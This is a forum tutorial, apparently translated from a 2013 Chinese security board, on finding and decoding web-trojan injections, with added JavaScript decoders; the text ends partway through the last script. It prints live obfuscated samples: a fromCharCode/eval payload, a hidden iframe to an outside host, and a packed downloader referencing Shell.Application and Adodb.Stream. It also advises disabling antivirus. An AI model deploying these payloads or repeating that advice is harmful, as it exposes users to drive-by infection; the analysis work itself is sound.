[Other] 蓝核 teaches you simple web-trojan unpacking, part 1, & an ad post (小a will false-positive this thread, but it's guaranteed clean)

蓝核
Posted 2013-4-20 22:39:28
This post was last edited by 蓝核 on 2013-4-21 23:12

Hoping this is my first post that gets to wear the "original" tag...! Oh yeah!
If the mods think that's not appropriate, just PM me and I'll switch it to "share"...

There's good stuff in post #4.

This tutorial is only for people who know nothing at all; think of it as the very simplest hunter entry-level tutorial, and also as me tidying up and summarizing my own thinking from the past few months of learning inside hunter. Since this post is aimed at the newbie section, I won't go into anything overly technical about web pages at all. (Self-roast: like hell I'd tell you... that I don't know any of it either...) For a somewhat deeper tutorial, feel free to apply to hunter; it's there once you join~~ I'm already writing part 2~ but that one probably won't go anywhere publicly visible.

It's split into two parts:

Rambling
Method
and at the end there's one more:
Advertisement


Rambling

Simply put, what is "unpacking a web trojan"? The bad guys take their cute little trojans and use various tricks to hide the download addresses, and our job is to dig those addresses out.

First, I recommend everyone read the tutorial 屁颠 posted in the Applications section: http://bbs.kafan.cn/thread-1300032-1-1.html

At this point some kid will say: I can't understand that article. I didn't study this stuff, I XXX...

Honestly, I can't understand it either, but go look at the web-trojan section; I've still managed to unpack them, haven't I...

At which point certain hunters will immediately stab me: XX, of course it's easy for you, you use tools!

Can't even look. Tell me, wouldn't it be better to just drag bad people who expose others' weaknesses like that straight out?

First, briefly, what do we need.

A computer with internet access, a browser, and a sandbox. It's best if the local machine doesn't have Java, because web trojans that go through Java vulnerabilities are a pain.

Oh, and remember: turn off your antivirus.

Kids will ask: why turn off the antivirus?

Because most antivirus today, even without a traffic-scanning feature, will still kill it once it lands locally. And generally the antivirus will block access to such-and-such page; then we can't see the code, or all we see is an empty screen. So what are you going to unpack?

But aren't web trojans dangerous? So scary!!! That's where the sandbox comes in. Of course plenty of experienced people just use Chrome or the like, and that works too, but I'd still recommend a sandbox. I trust the professional stuff more.

Any common browser works: Chrome, Firefox and Opera.

So what do we do next??

Obviously, go to the web-trojan section! People post practice problems right there.

Before heading over, let me explain my take on unpacking web trojans. It's very simple, just a few words: spot the difference, spot the odd one out.

Note that web trojans have another quirk: they're time-sensitive. Web trojans have it rough; you have no idea how fast the major browser vendors have been building their blacklists and whitelists these two years. Often I finally get a trojaned page open and Google's malware database has already warned about it, never mind IE's SmartScreen... so they often go dead. Honestly, these jerks have no sympathy for web trojans at all. They don't know how much effort the trojan distributors put into compromising sites to plant their little horses! What we need to watch for here is: if we're just in ordinary browsing mode, don't enter that site. If we're unpacking, click "I want to go in anyway".

What problems does this often cause... I can't find a good example...


蓝核
OP | Posted 2013-4-20 22:39:43
This post was last edited by 蓝核 on 2013-4-20 23:45

Method
Spot the difference
What we do next is dead simple: right-click, View Page Source.

I have to say here: although every browser has very powerful page-code inspection tools, like Opera's Dragonfly, I'm not used to them yet, so I still just read the page source directly. Other hunters are perfectly comfortable with them; use whatever suits you.

Let's use simple Baidu as an example... note that I've legally sanitized this page's code... so don't ask me... whether this page exists.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><html><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <title>百度一下,你就知道</title> <style >html,body{height:100%}html{overflow-y:auto}#wrapper{position:relative;_position:;min-height:100%}#content{padding-bottom:100px;text-align:center}#ftCon{height:100px;position:absolute;bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overflow:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-style:none}body,form,#fm{position:relative}td{text-align:left}img{border:0}a{color:#00c}a:active{color:#f60}#u{color:#999;padding:4px 10px 5px 0;text-align:right}#u a{margin:0 5px}#u .reg{margin:0}#m{width:720px;margin:0 auto}#nv a,#nv b,.btn,#lk{font-size:14px}#fm{padding-left:110px;text-align:left;z-index:1}input{border:0;padding:0}#nv{height:19px;font-size:16px;margin:0 0 4px;text-align:left;text-indent:137px}.s_ipt_wr{width:418px;height:30px;display:inline-block;margin-right:5px;background:url(http://s1.bdstatic.com/r/www/img/i-1.0.0.png) no-repeat -304px 0;border:1px solid #b6b6b6;border-color:#9a9a9a #cdcdcd #cdcdcd #9a9a9a;vertical-align:top}.s_ipt{width:405px;height:22px;font:16px/22px arial;margin:5px 0 0 7px;background:#fff;outline:0;-webkit-appearance:none}.s_btn{width:95px;height:32px;padding-top:2px\9;font-size:14px;background:#ddd url(http://s1.bdstatic.com/r/www/img/i-1.0.0.png);cursor:pointer}.s_btn_h{background-position:-100px 0}.s_btn_wr{width:97px;height:34px;display:inline-block;background:url(http://s1.bdstatic.com/r/www/img/i-1.0.0.png) no-repeat -202px 0;*position:relative;z-index:0;vertical-align:top}#lg img{vertical-align:top;margin-bottom:3px}#lk{margin:33px 0}#lk span{font:14px "宋体"}#lm{height:60px}#lh{margin:16px 0 
5px;word-spacing:3px}.tools{position:absolute;top:-4px;*top:10px;right:7px}#mHolder{width:62px;position:relative;z-index:296;display:none}#mCon{height:18px;line-height:18px;position:absolute;cursor:pointer;padding:0 18px 0 0;background:url(http://s1.bdstatic.com/r/www/img/bg-1.0.0.gif) no-repeat right -134px;background-position:right -136px\9}#mCon span{color:#00c;cursor:default;display:block}#mCon .hw{text-decoration:underline;cursor:pointer}#mMenu a{width:100%;height:100%;display:block;line-height:22px;text-indent:6px;text-decoration:none;filter:none\9}#mMenu,#user ul{box-shadow:1px 1px 2px #ccc;-moz-box-shadow:1px 1px 2px #ccc;-webkit-box-shadow:1px 1px 2px #ccc;filter:progid:DXImageTransform.Microsoft.Shadow(Strength=2,Direction=135,Color="#cccccc")\9}#mMenu{width:56px;border:1px solid #9b9b9b;list-style:none;position:absolute;right:27px;top:28px;display:none;background:#fff}#mMenu a:hover{background:#ebebeb}#mMenu .ln{height:1px;background:#ebebeb;overflow:hidden;font-size:1px;line-height:1px;margin-top:-1px}#cp,#cp a{color:#666}#seth{display:none;behavior:url(#default#homepage)}#setf{display:none}#sekj{margin-left:14px}#shouji{margin-right:14px}</style> <script>function h(obj){obj.style.behavior='url(#default#homepage)';var a = obj.setHomePage('http://www.baidu.com/');}</script></head><body> <div id="wrapper"><div id="content"> <div id="u"><a href="http://www.baidu.com/gaoji/preferences.html" name="tj_setting">搜索设置</a>|<a href="https://passport.baidu.com/v2/?login&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F" name="tj_login" id="lb" onclick="return false;">登录</a><a href="https://passport.baidu.com/v2/?reg&regType=1&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F" target="_blank" name="tj_reg" class="reg">注册</a></div> <div id="m"> <p id="lg"><img src="http://www.baidu.com/img/shouye_b5486898c692066bd2cbaeda86d74448.gif" width="270" height="129" ></p> <p id="nv"><a href="http://news.baidu.com">新&nbsp;闻</a> <b>网&nbsp;页</b> <a href="http://tieba.baidu.com">贴&nbsp;吧</a> <a 
href="http://zhidao.baidu.com">知&nbsp;道</a> <a href="http://music.baidu.com">音&nbsp;乐</a> <a href="http://image.baidu.com">图&nbsp;片</a> <a href="http://video.baidu.com">视&nbsp;频</a> <a href="http://map.baidu.com">地&nbsp;图</a></p><div id="fm"><form name="f" action="/s"><span class="s_ipt_wr"><input type="text" name="wd" id="kw" maxlength="100" class="s_ipt"></span><input type="hidden" name="rsv_bp" value="0"><input type=hidden name=ch value=""><input type=hidden name=tn value="cnopera_4_dg"><input type=hidden name=bar value=""><input type="hidden" name="rsv_spt" value="3"><input type="hidden" name="ie" value="utf-8"><span class="s_btn_wr"><input type="submit" value="百度一下" id="su" class="s_btn" onmousedown="this.className='s_btn s_btn_h'" onmouseout="this.className='s_btn'"></span></form><span class="tools"><span id="mHolder"><div id="mCon"><span>输入法</span></div></span></span><ul id="mMenu"><li><a href="#" name="ime_hw">手写</a></li><li><a href="#" name="ime_py">拼音</a></li><li class="ln"></li><li><a href="#" name="ime_cl">关闭</a></li></ul></div> <p id="lk"><a href="http://baike.baidu.com">百科</a> <a href="http://wenku.baidu.com">文库</a> <a href="http://www.hao123.com">hao123</a><span> | <a href="http://www.baidu.com/more/">更多&gt;&gt;</a></span></p><p id="lm"><a href="http://tieba.baidu.com/f?kw=%B5%D8%D5%F0" title="" target="_blank" style="font-family: 宋体,Arial,Helvetica,sans-serif;">支持雅安,寻找每一个生命奇迹</a></p> </div> </div> <div id="ftCon"><div id="ftConw"> <p ><a id="seth" onClick="h(this)" href="/" onmousedown="return ns_c({'fm':'behs','tab':'homepage','pos':0})">把百度设为主页</a><a id="setf" href="http://www.baidu.com/cache/sethelp/index.html" onmousedown="return ns_c({'fm':'behs','tab':'favorites','pos':0})" target="_blank">把百度设为主页</a><span id="sekj"><a href="http://liulanqi.baidu.com/ps.php" target="_blank" onmousedown="return ns_c({'fm':'behs','tab':'bdbrwlk','pos':1})">安装百度浏览器</a></span></p><p id="lh"><a href="http://e.baidu.com/?refer=888" onmousedown="return 
ns_c({'fm':'behs','tab':'btlink','pos':2})">加入百度推广</a> | <a href="http://top.baidu.com">搜索风云榜</a> | <a href="http://home.baidu.com">关于百度</a> | <a href="http://ir.baidu.com">About Baidu</a></p><p id="cp">&copy;2013 Baidu <a href="/duty/">使用百度前必读</a> <a href="http://www.miibeian.gov.cn" target="_blank">京ICP证030173号</a> <img src="http://www.baidu.com/cache/global/img/gs.gif"></p></div></div> </div> </body><script>var bds={se:{},comm : {ishome : 1,sid : "1439",user : "",username : "",sugHost : "http://suggestion.baidu.com/su",personalData : "",loginAction : []}}</script><script type="text/javascript" src="http://s1.bdstatic.com/r/www/cache/global/js/home-2.10.js" charset="gbk"></script><script>var bdUser = null;var w=window,d=document,n=navigator,k=d.f.wd,a=d.getElementById("nv").getElementsByTagName("a"),isIE=n.userAgent.indexOf("MSIE")!=-1&&!window.opera;(function(){if(/q=([^&]+)/.test(location.search)){k.value=decodeURIComponent(RegExp["\x241"])}})();if(n.cookieEnabled){bds.se.sug();};function addEV(o, e, f){if(w.attachEvent){o.attachEvent("on" + e, f);}else if(w.addEventListener){ o.addEventListener(e, f, false);}}function G(id){return d.getElementById(id);}function ns_c(q){var p = encodeURIComponent(window.document.location.href), sQ = '', sV = '', mu='', img = window["BD_PS_C" + (new Date()).getTime()] = new Image();for (v in q) {sV = q[v];sQ += v + "=" + sV + "&";} mu= "&mu=" + p ;img.src = "http://nsclick.baidu.com/v.gif?pid=201&pj=www&rsv_sid=1439&" + sQ + "path="+p+"&t="+new Date().getTime();return true;}if(/\bbdime=[12]/.test(d.cookie)){document.write('<script src=http://s1.bdstatic.com/r/www/cache/ime/js/openime-1.0.1.js charset="gbk"><\/script>');}(function(){var u = G("u").getElementsByTagName("a"), nv = G("nv").getElementsByTagName("a"), lk = G("lk").getElementsByTagName("a"), un = "";var tj_nv = ["news","tieba","zhidao","mp3","img","video","map"];var tj_lk = ["baike","wenku","hao123","more"];un = bds.comm.user == "" ? 
"" : bds.comm.user;function _addTJ(obj){addEV(obj, "mousedown", function(e){var e = e || window.event;var target = e.target || e.srcElement;ns_c({'fm':'behs','tab':target.name||'tj_user','un':encodeURIComponent(un)});});}for(var i = 0; i < u.length; i++){_addTJ(u[i]);}for(var i = 0; i < nv.length; i++){nv[i].name = 'tj_' + tj_nv[i];}for(var i = 0; i < lk.length; i++){lk[i].name = 'tj_' + tj_lk[i];}})();(function() {var links = {'tj_news': ['word', 'http://news.baidu.com/ns?tn=news&cl=2&rn=20&ct=1&ie=utf-8'],'tj_tieba': ['kw', 'http://tieba.baidu.com/f?ie=utf-8'],'tj_zhidao': ['word', 'http://zhidao.baidu.com/search?pn=0&rn=10&lm=0'],'tj_mp3': ['key', 'http://music.baidu.com/search?fr=ps&ie=utf-8'],'tj_img': ['word', 'http://image.baidu.com/i?ct=201326592&cl=2&nc=1&lm=-1&st=-1&tn=baiduimage&istype=2&fm=&pv=&z=0&ie=utf-8'],'tj_video': ['word', 'http://video.baidu.com/v?ct=301989888&s=25&ie=utf-8'],'tj_map': ['wd', 'http://map.baidu.com/?newmap=1&ie=utf-8&s=s'],'tj_baike': ['word', 'http://baike.baidu.com/search/word?pic=1&sug=1&enc=utf8'],'tj_wenku': ['word', 'http://wenku.baidu.com/search?ie=utf-8']};var domArr = [G('nv'), G('lk')],kw = G('kw');for (var i = 0, l = domArr.length; i < l; i++) {domArr[i].onmousedown = function(e) {e = e || window.event;var target = e.target || e.srcElement,name = target.getAttribute('name'),items = links[name],reg = new RegExp('^\\s+|\\s+\x24'),key = kw.value.replace(reg, '');if (items) {if (key.length > 0) {var wd = items[0], url = items[1],url = url + ( name === 'tj_map' ? encodeURIComponent('&' + wd + '=' + key) : ( ( url.indexOf('?') > 0 ? '&' : '?' 
) + wd + '=' + encodeURIComponent(key) ) );target.href = url;} else {target.href = target.href.match(new RegExp('^http:\/\/.+\.baidu\.com'))[0];}}name && ns_c({'fm': 'behs','tab': name,'query': encodeURIComponent(key),'un': encodeURIComponent(bds.comm.user || '') });};}})();addEV(w,"load",function(){k.focus()});w.onunload=function(){};</script><script type="text/javascript" src="http://s1.bdstatic.com/r/www/cache/global/js/tangram-1.3.4c1.0.js"></script><script type="text/javascript" src="http://s1.bdstatic.com/r/www/cache/user/js/u-1.3.7.js" charset="gbk"></script><script>try{document.cookie="WWW_ST=;expires=Sat, 01 Jan 2000 00:00:00 GMT";baidu.on(document.forms[0],"submit",function(){var _t=new Date().getTime();document.cookie = "WWW_ST=" + _t +";expires=" + new Date(_t + 10000).toGMTString()})}catch(e){}</script></html><script>(function(){var C=G("lm").getElementsByTagName("A");for(var B=0,A=C.length;B<A;B++){var D=C[B];addEV(D,"mousedown",(function(E,F){return function(){ns_c({fm:"behs",tab:"bdlnk",p1:F+1,title:E.innerHTML,url:E.href})}})(D,B))}})();</script><!--fcf1925a9059adfe--><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=hxxp://xxxx.om/zqpu.html?i=1962901></iframe>
So complicated, so dizzying... what is all this...

Relax.

First think: this site is Baidu, so basically anything with baidu.com plus a bit in front or behind is clean (note: this is just for ease of understanding; there are cases to distinguish, but I don't have a good example, since a trojaned site doesn't stay alive forever). Such as? Things like http://liulanqi.baidu.com/ps.php or http://tongji.baidu.com/tongji.js

OK, let's look at what on this page doesn't look like it should be Baidu's.

At this point some kid will point at the header:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
Look, a w3 link, how strange!

That's actually a declaration, a message telling the browser something; it has nothing to do with us, so we can let it go. Not bad, kid~~~ Remember, this one can basically go on your whitelist.

This one, bdstatic.com, is also Baidu's, so skip it too.

Let's keep looking.

Hey, why would Baidu have a Twitter link?
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=hxxp://xxxx.om/zqpu.html?i=1962901></iframe>
(this address has been sanitized; in theory this site doesn't exist...)
How odd, let's click in and see... but the address that follows isn't Twitter's at all. Er, how odd.
What can we do now? Use Trend. Who is Trend? Trend Micro was early and very good at cloud reputation. Come on, remember this URL:

http://global.sitesafety.trendmicro.com/index.php

Trend Micro's web reputation center.


Why recommend Trend?

First, Trend does this professionally.

Second, Trend tells you whether the site has malicious behavior and what kind: fraud, or malicious downloads. If it's clean, Trend tells you what the site does: selling ads? domain parking? Especially for foreign URLs, you really need Trend to give a verdict.

Third, Trend may tell you: sorry, we haven't tested it. OK, in this case you can be 80% sure this is the trojan address. The reasoning is far-fetched, but by now it's a gut feeling from habit.

Let's summarize this simplest method: open the sandbox, enter the malicious site, spot the difference, spot the odd one out. Of course, to be sure, verifying against Trend's malicious-site database is still a good idea.

As for spotting the odd one out, that comes once you've looked at enough normal sites... when you're reading code and suddenly see a huge string of bizarre numbers or gibberish.

For example:
<SCRIPT>ss=String["fromCharCode"];try{document.body|=1}catch(dgsgsdg){zz=26;whwej=12;ww=window;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","4c","4a","4d","4b","4c","3l","47","46","46","3n","3l","4c","4b","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c",
"48","26","1l","1l","4c","4a","4d","4b","4c","3l","47","46","46","3n","3l","4c","4b","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=0;i-634!=0;i++){k=i;s+=ss(parseInt(n[i],zz));}z=s;ww["eval"](""+s);}}}}</SCRIPT>
This kind of thing that keeps repeating is the bizarre stuff that's 99% likely a trojan... Honestly, this kind of thing... how do you unpack it? I really don't know... If you want to know how, please... come apply! By the way, I'd really like to know how that not-yet-confirmed member unpacked it...

One more tip on this method: remember the common whitelist... like qq... like Baidu... 114, 51la and so on...
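The `fromCharCode` gibberish quoted above can be read without ever running it: every quoted token is one character code written in the base stored in `zz` (26 here), and `s+=ss(parseInt(n[i],zz))` just rebuilds the hidden script one character at a time. The Node.js script below is an added example, not code from the original post or from 屁颠's tutorial; `extractQuotedArray`, `decodeTokens` and `guessRadix` are names chosen for this example, and the input is a constructed trim of the quoted script holding its first 49 tokens.

```javascript
'use strict';

// Constructed sample: a trimmed copy of the obfuscated script quoted in the post,
// keeping the radix variable (zz) and the first 49 of the 634 entries of the `n`
// array; every entry is one character code of the hidden second-stage script.
const SAMPLE_SNIPPET = 'zz=26;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c",'
  + '"1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30",'
  + '"3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d"];'
  + 'h=2;s="";for(i=0;i-49!=0;i++){s+=ss(parseInt(n[i],zz));}';

const DIGITS = '0123456789abcdefghijklmnopqrstuvwxyz';

// Pull the quoted tokens out of the largest ["..","..",..] literal in the script text.
function extractQuotedArray(source) {
  const arrays = source.match(/\[(?:\s*"[^"]*"\s*,?)+\]/g) || [];
  if (arrays.length === 0) return [];
  const biggest = arrays.reduce((a, b) => (b.length > a.length ? b : a));
  return biggest.match(/"([^"]*)"/g).map((q) => q.slice(1, -1));
}

// Decode each token as one character code written in `radix`, as
// String.fromCharCode(parseInt(token, radix)) would, but return null if any token
// has a digit outside the radix (parseInt would silently truncate "3o" to 3 in base 10).
function decodeTokens(tokens, radix) {
  const allowed = DIGITS.slice(0, radix);
  let out = '';
  for (const t of tokens) {
    if (!t || ![...t.toLowerCase()].every((ch) => allowed.includes(ch))) return null;
    out += String.fromCharCode(parseInt(t, radix));
  }
  return out;
}

// Share of characters that are printable ASCII or tab/LF/CR.
function printableRatio(text) {
  let ok = 0;
  for (const ch of text) {
    const c = ch.charCodeAt(0);
    if ((c >= 0x20 && c <= 0x7e) || c === 0x09 || c === 0x0a || c === 0x0d) ok++;
  }
  return text.length ? ok / text.length : 0;
}

// The radix usually hides behind a variable (zz above). Try every radix parseInt
// accepts and keep the one whose output looks most like source text.
function guessRadix(tokens) {
  let best = { radix: null, ratio: -1 };
  for (let radix = 2; radix <= 36; radix++) {
    const text = decodeTokens(tokens, radix);
    if (text === null) continue;
    const ratio = printableRatio(text);
    if (ratio > best.ratio) best = { radix, ratio };
  }
  return best.radix;
}

const sampleTokens = extractQuotedArray(SAMPLE_SNIPPET);
const sampleRadix = guessRadix(sampleTokens);
console.log(`tokens: ${sampleTokens.length}, guessed radix: ${sampleRadix}`);
console.log(JSON.stringify(decodeTokens(sampleTokens, sampleRadix)));
```

The 49 tokens decode to `\t\tif (document.getElementsByTagName('body')[0]){\r`, ordinary JavaScript, which is what confirms the guessed radix; run against the full 634-entry array from the post, the same two calls give the whole second-stage script that the original hands to `eval`.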


蓝核
OP | Posted 2013-4-20 22:39:58
This post was last edited by 蓝核 on 2013-4-20 23:47

Run it with alert
This example is taken straight from the example in 屁颠's post...

Trying to look friendlier than 屁颠 did...
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f["g"]["s"]("q");1 8="p:";1 9="0-k-0";1 7="l";1 5="G";1 2="N";1 c="Z-W-Y";1 K="U.X"+"M"+"L"+"H"+"T"+"T"+"P";1 V="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";1 3="O.";1 6="Q";1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))
Simply put, add tags to make it run.
Copy and paste this code into Notepad, change the eval to alert and leave everything else unchanged, but add <script></script> so it actually becomes a script. Save it as .htm (any file name). The processed code looks like this:
<script>
alert(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f["g"]["s"]("q");1 8="p:";1 9="0-k-0";1 7="l";1 5="G";1 2="N";1 c="Z-W-Y";1 K="U.X"+"M"+"L"+"H"+"T"+"T"+"P";1 V="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";1 3="O.";1 6="Q";1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))</script>
Note the head and the tail. Three things were added in total.

Double-click it, and you'll see: there it is!



This counts as unpacking too; ignore all that messy world and touch the core directly.

Remember, don't turn on the antivirus at this point either; don't worry about safety. Note: once you're done, delete that html file.

Don't ask me why it works, just remember it.

Of course, this method isn't a cure-all... sometimes... it won't run.

Using the antivirus
People who often visit malicious sites know it well: often the antivirus is on, and then the pop-ups start:
XXX.js was killed, jQuery.js, whatever, etc.

Especially kids who've already read part 1 will tell me: isn't jQuery.js supposed to be... a well-known thing too? Yes. But you should know, it's exactly this kind of thing that often gets used for bad deeds.

At this point unpacking is actually pretty simple... very simple: release that quarantined file, open it and read the code.
Nine times out of ten there's a

src=xxxx

Some antivirus will pop up a warning: page XXX is, per our investigation, a bad page, don't go there. You'll be surprised: huh, why does my browser show the BBB address?

This means the bad guys have, by technical means, forced site BBB into wearing XXX's clothes, and those clothes are poisoned.

That counts as half unpacked.

To summarize: when reading code, look at the head and the tail first; lazy people often put the little horse right there. Using the antivirus and alert is just routine; either way you already have a direction from above.
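Swapping eval for alert still runs the packer's own unpacking function in a browser. What that function does is mechanical (the p,a,c,k,e,d "packer": every word in the payload is a base-62 index into the word list, with empty slots meaning the word stands for itself), so it can be reimplemented and the sample handled purely as data. This Node.js script is an added example, not from the original post or 屁颠's; `unpackPacker`, `encodeIndex` and `stringLiterals` are names chosen here, and the input is the packed snippet quoted above.

```javascript
'use strict';

// Sample input: the packed snippet quoted in the post above, copied as raw text.
// String.raw keeps the \' escapes exactly as they appear on the page.
const PACKED_SAMPLE = String.raw`eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 z,y,x,v,w;B=\'C://I.u/F/D.E\';1 J=\'4.n\';1 i=\'4.h\';1 j=f["g"]["s"]("q");1 8="p:";1 9="0-k-0";1 7="l";1 5="G";1 2="N";1 c="Z-W-Y";1 K="U.X"+"M"+"L"+"H"+"T"+"T"+"P";1 V="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";1 3="O.";1 6="Q";1 R=3+6;1 2=8+2+c+9+7+5;',62,62,'|var|Gameeeeex|ying|Gameeeeee|Gameeeeesss|yings|Gameeeeess|Gameeeee|Gameeeees|||Gameeeeexx|||window|document|vbs|Gameeenames|chilam|983A|0C04||pif||clsid|object||createElement||com|wwwGameeecn|wwwGameeecn2|Gameeezfx|Gameeezfs|Gameeezf||Gameee|http|f5|css|xia|FC29E36||haoxia18|Gameeename|Gameeexml|||BD96C|Shell||Application|yingx|||Microsoft|Gameeeado|65A3||11D|556'.split('|'),0,{}))`;

// The packer's argument list: ('payload', radix, count, 'word|list'.split('|'), 0, {})
const PACKER_CALL = /\}\('((?:\\.|[^'\\])*)',(\d+),(\d+),'((?:\\.|[^'\\])*)'\.split\('\|'\),\d+,\{\}\)\)/;

// The packer's e(): write an index in base `radix` using 0-9, a-z, then A-Z
// (digit values 36..61 become 'A'..'Z' through fromCharCode(digit + 29)).
function encodeIndex(index, radix) {
  const prefix = index < radix ? '' : encodeIndex(Math.floor(index / radix), radix);
  const digit = index % radix;
  return prefix + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Rebuild the word dictionary and substitute every \b\w+\b token of the payload,
// the same transform the sample's own unpacker performs, without evaluating any of it.
function unpackPacker(packedSource) {
  const m = PACKER_CALL.exec(packedSource);
  if (!m) throw new Error('no p,a,c,k,e,d call found in input');
  const payload = m[1].replace(/\\(.)/g, '$1'); // undo the JS string escapes (\')
  const radix = Number(m[2]);
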